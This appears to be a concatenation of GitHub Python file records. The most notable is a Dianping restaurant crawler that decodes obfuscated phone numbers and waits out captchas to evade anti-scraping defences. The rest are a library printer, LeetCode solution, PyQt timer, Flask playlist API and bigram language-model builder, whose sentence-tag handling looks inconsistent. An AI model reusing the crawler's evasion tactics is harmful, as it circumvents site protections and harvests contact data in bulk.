except Exception as e:\n        print(e)\n        print('Failed to get the index page urls for the current category!')\n        time.sleep(4 + float(random.randint(1, 800)) / 200)\n        return None\n\n\n# Get the urls of all shop detail pages on the current index page\ndef get_detail_urls(html):\n    try:\n        shopids = re.findall('\"shop_img_click\" data-shopid=\"([0-9]+)\"', str(html), re.S)\n        for shopid in shopids:\n            url = url_base + shopid\n            yield url\n    except Exception as e:\n        print(e)\n        print('Failed to get the detail page urls for the current index page!')\n        time.sleep(4 + float(random.randint(1, 800)) / 200)\n        return None\n\n\n# Parse a shop detail page and extract all required fields\ndef parse_detail(html):\n    try:\n        if not html:\n            print('Oops, this shop detail page to parse is empty! Next one!')\n            # time.sleep(4 + float(random.randint(1, 800)) / 200)\n            return None\n        doc = pq(html)\n        data = []\n        infos = re.findall(\n            'shopName: \"(.*?)\", address: \"(.*?)\", publicTransit: .*?cityName: \"(.*?)\", cityEnName.*?shopPower:([0-9]+),.*?mainCategoryName:\"(.*?)\", categor',\n            html, re.S)\n        
if infos:\n            for info in infos[0]:\n                data.append(info)\n        else:\n            # for i in range(5):\n            #     data.append('')\n            print('Could not get valid shop name/address/city info - must be a slide captcha, go slide it, quick quick quick!')\n            time.sleep(12 + float(random.randint(1, 1600)) / 200)  # wait 10-20 seconds; use the time to solve the detail page slide captcha\n            return None\n        tel = str(doc('.expand-info.tel span'))[35:]\n        for i in range(10):\n            tel = tel.replace(list_map[i], str(i))\n            tel = tel.replace(list_map2[i], str(i))# simple decryption of the phone number\n        tele = \";\".join(tel.split())  # strip the whitespace between multiple phone numbers and join them with ;\n        if tele:\n            data.append(tele)\n            if tele == '无':  # '无' is the page's placeholder for 'none'\n                print('Hmph, shop info without even a phone number is useless - next!')\n                return None\n        else:\n            # data.append('')\n            print('Could not get a valid phone number!')\n        category = doc('.breadcrumb').text()\n        if category:\n            data.append(category)\n        else:\n            # data.append('')\n            print('Could not get valid category info!')\n        info_str = str(doc('.brief-info span'))\n        if info_str:\n            for i in range(10):\n                info_str = info_str.replace(list_map[i], str(i))\n                info_str = info_str.replace(list_map2[i], str(i))\n            info = pq(info_str)\n            rank = info('.mid-rank-stars').attr.title\n            data.append(rank)\n            count = info('#reviewCount').text()\n            data.append(count)\n            avgprice = info('#avgPriceTitle').text()\n            data.append(avgprice)\n            items = info('#comment_score .item')\n            infos = re.findall(\n                '口味: (.+?) 环境: (.+?) 服务: (.+?) ',\n                str(items), re.S)\n            if infos:\n                for info in infos[0]:\n                    data.append(info)\n            else:\n                # for i in range(6):\n                #     data.append('')\n                print('Failed to get rating, avg price, review count, taste, environment and service info!')\n        return data\n    except Exception as e:\n        print('Oops, ran into a bug, details below:\\n', e)\n        # print('Failed to get the data on this detail page! Open the url above and solve the slide captcha!!! (if there is one)')\n        # time.sleep(10 + float(random.randint(1, 2000)) / 200)  # wait 10-20 seconds; use the time to solve the detail page slide captcha\n        return None\n\n\n# shop name, address, city, score, category, phone, location, rating, review count, avg price, taste, environment, service\ndef main():\n    # Collect all category urls under the city navigation\n    # url = 'http://www.dianping.com/guangzhou/ch10/g4473'  # fill in the start url of the city to crawl\n    # html = get_html(url)\n    # urls = []  # first collect all category urls under one city's navigation into the list urls\n    # for urindex in get_index_urls(html):\n    #     if urindex not in urls:\n    #         urls.append(urindex)\n    #         print('Collecting category index url: ' + urindex)\n    # print('\\n', f'Category index url collection finished! There are {len(urls)} category index urls in total! 
\\n')\n    with open('URLS/北京美食urls.txt', 'r') as f:\n        urls = f.readlines()\n    with open(r'C:\\Users\\Ph\\Desktop\\AntAgent_Data\\大众点评\\北京美食2.csv', 'w', newline='', encoding='utf-8-sig') as csvfile:\n        writer = csv.writer(csvfile)\n        writer.writerow(['店名', '地址', '城市', '评分', '类别', '联系方式', '定位', '评级', '评论数', '人均价格', '口味', '环境', '服务'])\n        check = []\n        for index, urlindex in enumerate(urls):\n            urlindex = urlindex.strip()\n            print('\\n', f'Start crawling category {index}: {urlindex}; {len(urls)} categories in total', '\\n')\n            html = get_index_html(urlindex)\n            page = get_page_num(html)\n            if not page:  # if this category has only one page, get_page_num returns None; set it to 1 manually or it will error\n                page = int(1)\n            print(f'Category {urlindex} has {page} pages in total', '\\n')\n            i = 1\n            while i <= page:\n                # time.sleep(3 + float(random.randint(1, 600))/200)\n                url_page = urlindex + 'p' + str(i)  # build the index page url for each page number\n                print('\\n', f'Start crawling page {i}: {url_page}', '\\n')\n                html = get_index_html(url_page)\n                uris = []\n                for uri in get_detail_urls(html):\n                    if uri not in uris:\n                        uris.append(uri)\n                i += 1\n                if not uris:\n                    print('Damn, most likely hit the index page letter captcha; you get one minute, go verify it!!!')\n                    time.sleep(60 + float(random.randint(1, 1000))/200)\n                    continue\n                for uri in uris:\n                    print(f'Start crawling detail page: {uri}')\n                pool = Pool(4)  # use a thread pool to speed things up; set the number to your cpu core count\n                htmls = pool.map(get_detail_html, uris)\n                # datas = pool.map(parse_detail, htmls)\n                pool.close()\n                pool.join()\n                for html in htmls:\n                    data = parse_detail(html)\n                    if data:\n                        if data not in check:\n                            check.append(data)  # deduplication check\n                            writer.writerow(data)  # write the crawled detail page info to the csv\n                            print(f'Written to CSV: {data}')\n                        else:\n                            print('This detail page info already exists')\n                    # else:\n                    #     print('Crawled no info at all, sob - or maybe crawled garbage! Skip, skip!')\n                    # time.sleep(4 + float(random.randint(1, 600))/100)\n\n\nif __name__ == '__main__':\n    start = time.time()\n    main()\n    print('Complete!!!!!!!!!!')\n    end = time.time()\n    spend = end - start\n    hour = spend // 3600\n    minu = (spend - 3600 * hour) // 60\n    sec = spend - 3600 * hour - 60 * minu\n    print(f'Took {hour} hours {minu} minutes {sec} seconds in total')\n","repo_name":"ginping/notebook","sub_path":"spider/大众点评/DZDPcrawl.py","file_name":"DZDPcrawl.py","file_ext":"py","file_size_in_byte":12798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31294941299","text":"import sys\nsys.path.append('..')\n\nfrom _Library.BookClass import Book, BookSet, BookItem\nfrom _Library.LibraryClass import Library, Rack, Shelf\nfrom enums import BookSubject, BookStatus, BookFormat, Address\n\n\nclass Printer:\n    def __init__(self):\n        pass\n\n    def book_printer(self, book):\n        assert isinstance(book, Book)\n        print(f\"Book name: {book.title}, written by {book.author}.\\n\"\n              f\"Please use {book.isbn} to query book locations.\")\n\n    def bookset_printer(self, bookset):\n        assert isinstance(bookset, BookSet)\n        print(f\"Book name: {bookset.book.title}, placed at {bookset.location}, \"\n              f\"current available quantity is {bookset.check_availability()}.\")\n\n    def library_printer(self, library):\n        assert isinstance(library, Library)\n        print(f\"{library.name}, located at {library.address},\"\n              f\" with {len(library.racks)} {'racks' if len(library.racks)>1 else 'rack'}\")\n\n    def rack_printer(self, rack):\n        assert isinstance(rack, Rack)\n        print(f\"{rack.library.name}, rack id {rack.rack_id},\"\n              f\" with {len(rack.shelves)} {'shelves' if len(rack.shelves)>1 else 'shelf'}\")\n\n    def shelf_printer(self, shelf):\n        assert isinstance(shelf, Shelf)\n        print(f\"{shelf.rack.library.name}, rack id {shelf.rack.rack_id},\"\n              f\" shelf id {shelf.shelf_id}, placing following books:\")\n        for bs in shelf.booksets.values():\n            self.bookset_printer(bs)\n\n    def 
shelf_detailed_printer(self, shelf):\n        assert isinstance(shelf, Shelf)\n        print(f\"{shelf.rack.library.name}, rack id {shelf.rack.rack_id},\"\n              f\" shelf id {shelf.shelf_id}, placing following books:\")\n        for bs in shelf.booksets.values():\n            for bi in bs.bookitems.values():\n                self.bookitem_printer(bi)\n\n    def bookitem_printer(self, bookitem):\n        assert isinstance(bookitem, BookItem)\n        if bookitem.status == BookStatus.Available:\n            print(f\"Book id of {bookitem.isbn_id}, is {bookitem.status.name}.\")\n        elif bookitem.status == BookStatus.Loaned:\n            print(f\"Book id of {bookitem.isbn_id} is {bookitem.status.name},\"\n                  f\" due date is {bookitem.due_date}.\")\n        else:\n            print(f\"Book id of {bookitem.isbn_id} is {bookitem.status.name}.\")\n\n\nif __name__ == '__main__':\n    a1 = Address('503 Beautiful Rd', 'Thiscity', 'WA', '98188', 'USA')\n    l1 = Library('Tom Library', a1)\n    r1 = l1.add_rack()\n    r2 = l1.add_rack()\n    s1 = r1.add_shelf()\n    s11 = r1.add_shelf()\n    s2 = r2.add_shelf()\n\n    print(s1,s2)\n\n    bk1 = l1.inventory.create_new_book('0-7475-3269-9',\"Harry Potter and The Philosopher's Stone\",\n                                       \"J. K. Rowling\", \"Bloomsbury Publishing\", \"English\",\n                                       BookSubject.Fiction, BookFormat.Hardcopy, 336)\n\n    bk2 = l1.inventory.create_new_book('0-7475-5100-6',\"Harry Potter and The Order of the Phoenix\",\n                                       \"J. K. Rowling\", \"Bloomsbury Publishing\", \"English\",\n                                       BookSubject.Fiction, BookFormat.Hardcopy, 389)\n\n    bs1 = l1.inventory.create_new_bookset(bk1, s2)\n    bs2 = l1.inventory.create_new_bookset(bk2, s2)\n    bs1.create_book_item(5)\n    bs2.create_book_item(3)\n    Printer().library_printer(l1)\n    Printer().rack_printer(r1)\n    Printer().shelf_detailed_printer(s2)\n    bs1.get_book_item_by_id(2).checkout()\n    bs2.get_book_item_by_id(3).checkout()\n    # Printer().bookitem_printer(bs2.get_book_item_by_id(3))\n    print(\"\\nAfter checking out books\")\n    Printer().shelf_detailed_printer(s2)","repo_name":"sjhhh3/Library-Management-System","sub_path":"_Library/Information.py","file_name":"Information.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23160136327","text":"\"\"\"\nhttps://leetcode.com/explore/interview/card/top-interview-questions-hard/116/array-and-strings/827/\n\"\"\"\n\nfrom typing import List\n\n# referenced solution to arrive at this result\nclass Solution:\n    def product_except_self(self, nums: List[int]) -> List[int]:\n        \"\"\"\n        no division\n        O(n) desired runtime\n        *except nums[i]\n        brute force would be O(n^2)\n        could do even better with a running prefix multiplier, but then would have\n        to divide out nums[i] at each step\n        n > 1\n        don't necessarily know that input is sorted, so can't use that\n        dynamic programming?\n        with division would be easy...\n        two-finger approach? 
nope, would be O(n^2)\n ...\n we know all products are 32bits, so that isn't an issue to consider rn...\n binary approach?\n # use L and R arrays - was on the right idea there!!!\n \"\"\"\n N = len(nums)\n L, R = [0] * N, [0] * N\n L[0] = 1\n for i in range(1, N):\n L[i] = L[i - 1] * nums[i - 1]\n\n R[N - 1] = 1\n for j in reversed(range(N - 1)):\n R[j] = R[j + 1] * nums[j + 1]\n\n return [L[i] * R[i] for i in range(N)]\n\n\nclass SolutionOptimized:\n def product_except_self(self, nums: List[int]) -> List[int]:\n N = len(nums)\n ans = [0] * N\n ans[0] = 1\n for i in range(1, N):\n ans[i] = ans[i - 1] * nums[i - 1]\n\n # multiply by things on the right, and update that value R as we go\n R = 1\n for j in reversed(range(N)):\n ans[j] *= R\n R *= nums[j]\n\n return ans\n","repo_name":"kalyons11/kevin","sub_path":"kevin/leet/product_except_self.py","file_name":"product_except_self.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"8013537367","text":"import numpy as np\nimport random\nimport copy\n\nclass Utils:\n def __init__(self):\n pass\n \n def decimalToBinaryRec(num,ret,idx):\n if num > 1:\n Utils.decimalToBinaryRec(num // 2, ret, idx-1)\n ret[idx] = num % 2\n \n def decimalToBinary(num):\n ret = [0,0,0,0,0,0,0,0]\n Utils.decimalToBinaryRec(num,ret,len(ret)-1)\n return ret\n\n def binaryToDecimal(num):\n aux = copy.deepcopy(num)\n aux.reverse()\n res = 0\n for idx, n in enumerate(aux):\n res += n * (2**idx)\n return res\n \n #[0,1,2,3,4,5,6,7]\n #pm = 0.20 * (i*0.10)\n \n def bitMutation(bit, pm):\n if pm > random.random():\n if bit == 0:\n bit = 1\n else:\n bit = 0\n return bit\n ","repo_name":"navfran98/TP1-SIA","sub_path":"LadoB/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36250271001","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtGui\n\n\nclass UiDialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(532, 321)\n Dialog.setAcceptDrops(False)\n Dialog.setSizeGripEnabled(False)\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(40, 50, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.label.setFont(font)\n self.label.setAutoFillBackground(False)\n self.label.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.label.setTextFormat(QtCore.Qt.AutoText)\n self.label.setScaledContents(False)\n self.label.setOpenExternalLinks(False)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(280, 50, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.label_2.setFont(font)\n self.label_2.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.label_2.setObjectName(\"label_2\")\n self.widget = QtWidgets.QWidget(Dialog)\n self.widget.setGeometry(QtCore.QRect(40, 90, 461, 51))\n self.widget.setObjectName(\"widget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.lcdNumber_twt = QtWidgets.QLCDNumber(self.widget)\n self.lcdNumber_twt.setObjectName(\"lcdNumber_twt\")\n self.horizontalLayout.addWidget(self.lcdNumber_twt)\n self.lcdNumber_trt = QtWidgets.QLCDNumber(self.widget)\n self.lcdNumber_trt.setObjectName(\"lcdNumber_trt\")\n 
self.horizontalLayout.addWidget(self.lcdNumber_trt)\n self.savedata = QtWidgets.QPushButton(Dialog)\n self.savedata.setGeometry(QtCore.QRect(230, 210, 75, 23))\n self.savedata.setObjectName(\"savedata\")\n self.widget1 = QtWidgets.QWidget(Dialog)\n self.widget1.setGeometry(QtCore.QRect(40, 150, 77, 54))\n self.widget1.setObjectName(\"widget1\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget1)\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.start_twt = QtWidgets.QPushButton(self.widget1)\n self.start_twt.setObjectName(\"start_twt\")\n self.verticalLayout_2.addWidget(self.start_twt)\n self.stop_twt = QtWidgets.QPushButton(self.widget1)\n self.stop_twt.setObjectName(\"stop_twt\")\n self.verticalLayout_2.addWidget(self.stop_twt)\n self.widget2 = QtWidgets.QWidget(Dialog)\n self.widget2.setGeometry(QtCore.QRect(420, 150, 77, 54))\n self.widget2.setObjectName(\"widget2\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.widget2)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.start_trt = QtWidgets.QPushButton(self.widget2)\n self.start_trt.setObjectName(\"start_trt\")\n self.verticalLayout.addWidget(self.start_trt)\n self.stop_trt = QtWidgets.QPushButton(self.widget2)\n self.stop_trt.setObjectName(\"stop_trt\")\n self.show_graph = QtWidgets.QPushButton(Dialog)\n self.show_graph.setObjectName(\"show_graph\")\n self.show_graph.setGeometry(QtCore.QRect(222, 235, 91, 23))\n self.clear_data = QtWidgets.QPushButton(Dialog)\n self.clear_data.setObjectName(\"clear_data\")\n self.verticalLayout.addWidget(self.stop_trt)\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"RTimer\"))\n self.label.setText(_translate(\"Dialog\", \"Total working time\"))\n self.label_2.setText(_translate(\"Dialog\", \"Total rest time\"))\n self.savedata.setText(_translate(\"Dialog\", \"Save data\"))\n self.show_graph.setText(_translate(\"Dialog\", \"Show Plots\"))\n self.start_twt.setText(_translate(\"Dialog\", \"Start\"))\n self.stop_twt.setText(_translate(\"Dialog\", \"Stop\"))\n self.start_trt.setText(_translate(\"Dialog\", \"Start\"))\n self.stop_trt.setText(_translate(\"Dialog\", \"Stop\"))\n self.clear_data.setText(_translate(\"Dialog\", \"Clear data\"))\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n apl = QtWidgets.QMainWindow()\n ui = UiDialog()\n ui.setupUi(apl)\n apl.show()\n app.exec()\n","repo_name":"pertsezhuisky/RTimer","sub_path":"WorkToRest.py","file_name":"WorkToRest.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"3117511410","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\n\n#Initializing playlist app\napp = Flask(__name__)\napp.config.from_object(\"project.config.Config\")\n#Database SQLalchemy\ndb = SQLAlchemy(app) #object relation mapper\nma = Marshmallow(app) #convert object from python datatype\n\nclass Playlist(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n author = db.Column(db.String(100))\n length = db.Column(db.Float)\n genre = db.Column(db.String(100))\n\n def __init__(self, name, author, length, genre):\n self.name = name\n 
self.author = author\n        self.length = length\n        self.genre = genre\n\n#Playlist Schema\nclass PlaylistSchema(ma.Schema):\n    class Meta:\n        fields = ('id', 'name', 'author', 'length', 'genre')\n\n#Init Schema\nplaylist_schema = PlaylistSchema()\nplaylists_schema = PlaylistSchema(many=True)\n\n#Testing route\n@app.route(\"/\")\ndef hello_world():\n    return jsonify(hello=\"world\")\n\n#Add Song\n@app.route('/playlist', methods=['POST'])\ndef add_song():\n    name = request.json['name']\n    author = request.json['author']\n    length = request.json['length']\n    genre = request.json['genre']\n    new_song = Playlist(name, author, length, genre)\n    #to add song and save to db\n    db.session.add(new_song)\n    db.session.commit()\n\n    return playlist_schema.jsonify(new_song)\n\n\n#Get Song\n@app.route('/playlist', methods=['GET'])\ndef get_song():\n    songs = Playlist.query.all()\n    output = playlists_schema.dump(songs)\n\n    return jsonify(output)\n\n\n#Update Song\n@app.route('/playlist/<id>', methods=['PUT'])\ndef update_song(id):\n    playlist = Playlist.query.get(id)\n    name = request.json['name']\n    author = request.json['author']\n    length = request.json['length']\n    genre = request.json['genre']\n\n    playlist.name = name\n    playlist.author = author\n    playlist.length = length\n    playlist.genre = genre\n\n    db.session.commit()\n\n    return playlist_schema.jsonify(playlist)\n\n\n#Delete Song\n@app.route('/playlist/<id>', methods=['DELETE'])\ndef delete_song(id):\n    playlist = Playlist.query.get(id)\n    db.session.delete(playlist)\n    db.session.commit()\n\n    return playlist_schema.jsonify(playlist)\n","repo_name":"Vshalson/PYTHON-REST-API","sub_path":"services/web/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"13422018912","text":"import sys\nimport collections\nimport math\n\n\n# Incorporates the pre-processing steps for each line in the inputFile\ndef process_input(buffer, words):\n    # Split the sentences by period\n    buffer = buffer.replace(\". 
\", \".\")\n sentences = buffer.split(\".\")\n\n # Loop through and split each word into word arrays\n for i in sentences:\n split_sentence = i.split(\" \")\n split_sentence.insert(0, \"\")\n split_sentence.append(\"\")\n # Remove any empty words\n words.append([str.lower(x) for x in split_sentence if x])\n\n\n# Removes newlines and tabs from each line read from the file\ndef process_line(self):\n line = self.replace(\"\\n\", \" \")\n line2 = line.replace(\"\\t\", \"\")\n return line2\n\n\n# Calculate the unique number of words for V\ndef calculate_v(unigrams_count):\n return len(unigrams_count)\n\n\n# Calculates mle for a bigram\ndef calculate_mle(bi, i, bigrams_count, unigrams_count, unigrams):\n if bi == ['', '']:\n return 1\n if i != -1:\n num = bigrams_count[i]\n den = unigrams_count[unigrams.index(bi[0])]\n return num / den\n else:\n return 0\n\n\n# Calculates the Laplace for a bigram\ndef calculate_laplace(bi, v, i, bigrams_count, unigrams_count, unigrams):\n neu = bigrams_count[i] + 1\n den = unigrams_count[unigrams.index(bi[0])] + v + 1\n return neu / den\n\n\n# Calculates the interpolation for a bigram\ndef calculate_inter(l, bi, mle_prob, v, all_unigrams, unigrams, unigrams_count):\n try:\n py = (unigrams_count[unigrams.index(bi[1])] + 1) / (len(all_unigrams) + v + 1)\n result = (l * mle_prob) + ((1 - l) * py)\n except ValueError:\n py = (0 + 1) / (len(all_unigrams) + v + 1)\n result = (l * mle_prob) + ((1 - l) * py)\n return result\n\n\n# For training Katz = AD\ndef calculate_ad(bi, i, bigrams_count, unigrams_count, unigrams):\n # D = 0.5\n return (bigrams_count[i] - 0.5) / unigrams_count[unigrams.index(bi[0])]\n\n\n# Writes the top bigrams to a file, excluding start and stop tags\ndef write_top_bigrams(bigrams, probs):\n with open(\"top-bigrams.txt\", 'w') as file:\n for b in bigrams:\n file.write('{}, {}\\n'.format(b, probs[bigrams.index(b)]))\n\n\ndef write_bigram(l, bigrams, bigrams_count, mle, laplace, inter, katz):\n with open(\"bigram.lm\", 'w') as file:\n index = 0\n file.write('LAMBDA {}\\n'.format(l))\n for b in bigrams:\n w1, w2, bc = b[0], b[1], bigrams_count[index]\n m, l, i, k = mle[index], laplace[index], inter[index], katz[index]\n file.write('{}, {}, {}, {}, {}, {}, {}\\n'.format(w1, w2, bc, m, l, i, k))\n index += 1\n\n\ndef write_unigram(unigrams, unigrams_count):\n with open(\"unigram.lm\", 'w') as file:\n index = 0\n for u in unigrams:\n file.write('{}, {}\\n'.format(u, unigrams_count[index]))\n index += 1\n\n\ndef fill_buffer(inputfile, buffer, words):\n # Try opening the file\n try:\n with open(inputfile, 'r') as fileObj:\n # Loop through and read the file line by line\n while True:\n line = fileObj.readline()\n if not line:\n break\n # Process the lines into a buffer\n buffer += process_line(line)\n process_input(buffer, words)\n except IOError:\n print(inputfile, \" not found\")\n\n\ndef process_dev(words, all_dev_unigrams, dev_unigrams, all_dev_bigrams, dev_bigrams):\n\n # Organize all unigrams into a list for counting\n for x in words:\n for y in x:\n all_dev_unigrams.insert(len(all_dev_unigrams), y)\n # Get rid of duplicate unigrams\n unigram_set = set(all_dev_unigrams)\n for u in unigram_set:\n dev_unigrams.append(u)\n\n # Organize all dev bigrams into a list for counting\n for x in words:\n sentence_bigrams = [x[y: y + 2] for y in range(len(x) - 1)]\n for y in sentence_bigrams:\n all_dev_bigrams.insert(len(all_dev_bigrams), y)\n if y[1] == '':\n all_dev_bigrams.insert(len(all_dev_bigrams), ['', ''])\n del all_dev_bigrams[len(all_dev_bigrams) - 1]\n 
del all_dev_bigrams[len(all_dev_bigrams) - 1]\n    del all_dev_bigrams[len(all_dev_bigrams) - 1]\n\n    # Get rid of duplicate dev bigrams\n    bigrams_set = set(map(tuple, all_dev_bigrams))\n    for b in bigrams_set:\n        dev_bigrams.append(b)\n\n\ndef unigram_laplace(v, total_tokens, x):\n    return (x + 1) / (total_tokens + v + 1)\n\n\ndef get_lambda(v, unigrams_count, all_unigrams, unigrams, bigrams, bigrams_count):\n    buffer = \"\"\n    words = []\n    all_dev_bigrams = []\n    dev_bigrams = []\n    all_dev_unigrams = []\n    dev_unigrams = []\n\n    inputfile = \"dev.txt\"\n    fill_buffer(inputfile, buffer, words)\n\n    process_dev(words, all_dev_unigrams, dev_unigrams, all_dev_bigrams, dev_bigrams)\n\n    # Make necessary calculations for each bigram\n    # Sum all interpolated probabilities together with different lambdas\n    lambdas = [0.1, 0.3, 0.5, 0.7, 0.9]\n    inters = []\n    for l in lambdas:\n        val = 0\n        for b in all_dev_bigrams:\n            try:\n                m = calculate_mle(b, bigrams.index(tuple(b)), bigrams_count, unigrams_count, unigrams)\n            except ValueError:\n                if b == ['</s>', '<s>']:\n                    m = 1\n                else:\n                    m = 0\n            # Sum all interpolation probabilities\n            try:\n                u = unigram_laplace(v, len(all_unigrams), unigrams_count[unigrams.index(b[1])])\n            except ValueError:\n                u = (0 + 1) / (len(all_unigrams) + v + 1)\n\n            inter = (l * m) + ((1 - l) * u)\n            if inter != 0:\n                val += math.log2(inter)\n\n        inters.append(val)\n\n    # Multiply each value by -1/N and raise 2 to that power\n    lower = 0\n    lower_val = 0\n    first = -1\n    index = 0\n    for inte in inters:\n        inte *= (-1 / len(all_dev_unigrams))\n        inte = math.pow(2, inte)\n        if first == -1:\n            lower = index\n            lower_val = inte\n            first = 0\n        elif inte < lower_val:\n            lower_val = inte\n            lower = index\n        index += 1\n    return lambdas[lower]\n\n\ndef top_bigrams(laplace, v, all_unigrams, bigrams):\n    joint_probs = {}\n    joint_prob = []\n    index = 0\n    for b in bigrams:\n        pl = (all_unigrams.count(b[0]) + 1) / (len(all_unigrams) + v + 1)\n        k = pl * laplace[bigrams.index(b)]\n        joint_prob.insert(bigrams.index(b), k)\n        joint_probs.setdefault(k, []).append(bigrams.index(b))\n        index += 1\n\n    # Sort the bigrams by probabilities from greatest to least\n    ordered_probs = dict(collections.OrderedDict(sorted(joint_probs.items(), reverse=True)))\n    reverse_order = list(reversed(sorted(ordered_probs.keys())))\n    count = 0\n    joint20_prob = []\n    joint20_bigrams = []\n    for r in reverse_order:\n        if count == 20:\n            break\n        lst = ordered_probs.get(r)\n        for l in lst:\n            w1 = bigrams[l][0]\n            w2 = bigrams[l][1]\n            if '<s>' not in w1 and '</s>' not in w1 and '<s>' not in w2 and '</s>' not in w2:\n                joint20_prob.insert(count, joint_prob[l])\n                joint20_bigrams.insert(count, bigrams[l])\n                count += 1\n\n            if count == 20:\n                break\n    write_top_bigrams(joint20_bigrams, joint20_prob)\n\n\n# Constructs the bigram ml to be written to a file\ndef bigram(words, v, all_unigrams, all_bigrams, bigrams_count, bigrams, unigrams_count, unigrams):\n    mle = []  # Keep track of mle calculations\n    laplace = []\n    inter = []\n    katz = []\n\n    # Organize all bigrams into a list for counting\n    for x in words:\n        sentence_bigrams = [x[y: y + 2] for y in range(len(x) - 1)]\n        for y in sentence_bigrams:\n            all_bigrams.insert(len(all_bigrams), y)\n            if y[1] == '</s>':\n                all_bigrams.insert(len(all_bigrams), ['</s>', '<s>'])\n\n    del all_bigrams[len(all_bigrams) - 1]\n    del all_bigrams[len(all_bigrams) - 1]\n    del all_bigrams[len(all_bigrams) - 1]\n\n    # Get rid of duplicate bigrams\n    bigrams_set = set(map(tuple, all_bigrams))\n    for b in bigrams_set:\n        bigrams.append(b)\n\n    # Add each bigram to the end of the list\n    for b in bigrams:\n        
bigrams_count.append(all_bigrams.count(list(b))) # Calculate the frequency of each bigram\n\n l = get_lambda(v, unigrams_count, all_unigrams, unigrams, bigrams, bigrams_count)\n # Make necessary calculations for each bigram\n for b in bigrams:\n\n # Calculate the MLE Probability\n m = calculate_mle(b, bigrams.index(b), bigrams_count, unigrams_count, unigrams)\n mle.append(m)\n\n # Calculate the Laplace Probability\n laplace.append(calculate_laplace(b, v, bigrams.index(b), bigrams_count, unigrams_count, unigrams))\n\n # Calculate the Interpolated Probability\n inter.append(calculate_inter(l, b, m, v, all_unigrams, unigrams, unigrams_count))\n\n # Calculate the AD probability\n katz.append(calculate_ad(b, bigrams.index(b), bigrams_count, unigrams_count, unigrams))\n\n write_bigram(l, bigrams, bigrams_count, mle, laplace, inter, katz)\n return laplace\n\n\n# Constructs the unigram ml to be written to a file\ndef unigram(words, unigrams_count, all_unigrams, unigrams):\n # Organize all unigrams into a list for counting\n for x in words:\n for y in x:\n all_unigrams.insert(len(all_unigrams), y)\n # Get rid of duplicate unigrams\n unigram_set = set(all_unigrams)\n for u in unigram_set:\n unigrams.append(u)\n\n for u in unigrams:\n unigrams_count.append(all_unigrams.count(u))\n\n write_unigram(unigrams, unigrams_count)\n return calculate_v(unigrams_count)\n\n\nclass LMB:\n if __name__ == \"__main__\":\n buffer = \"\"\n words = []\n\n all_unigrams = []\n unigrams_count = []\n all_bigrams = [] # Keep track of all bigrams\n bigrams_count = [] # Keep track of the frequency of each bigram\n bigrams = [] # Keep track of unique bigrams\n unigrams = []\n\n if len(sys.argv) < 2:\n print(\"Please specify file to convert\")\n sys.exit()\n\n # Get the filename\n inputFile = sys.argv[1]\n # inputFile = \"../inputs/train.txt\"\n\n fill_buffer(inputFile, buffer, words)\n v = unigram(words, unigrams_count, all_unigrams, unigrams)\n laplace = bigram(words, v, all_unigrams, all_bigrams, bigrams_count, bigrams, unigrams_count, unigrams)\n top_bigrams(laplace, v, all_unigrams, bigrams)\n","repo_name":"mshankar13/NLP","sub_path":"hw1/lm-builder.py","file_name":"lm-builder.py","file_ext":"py","file_size_in_byte":10597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34988077088","text":"\"\"\"init\n\nRevision ID: f0a360160370\nRevises: \nCreate Date: 2023-10-30 01:00:33.980419\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f0a360160370'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
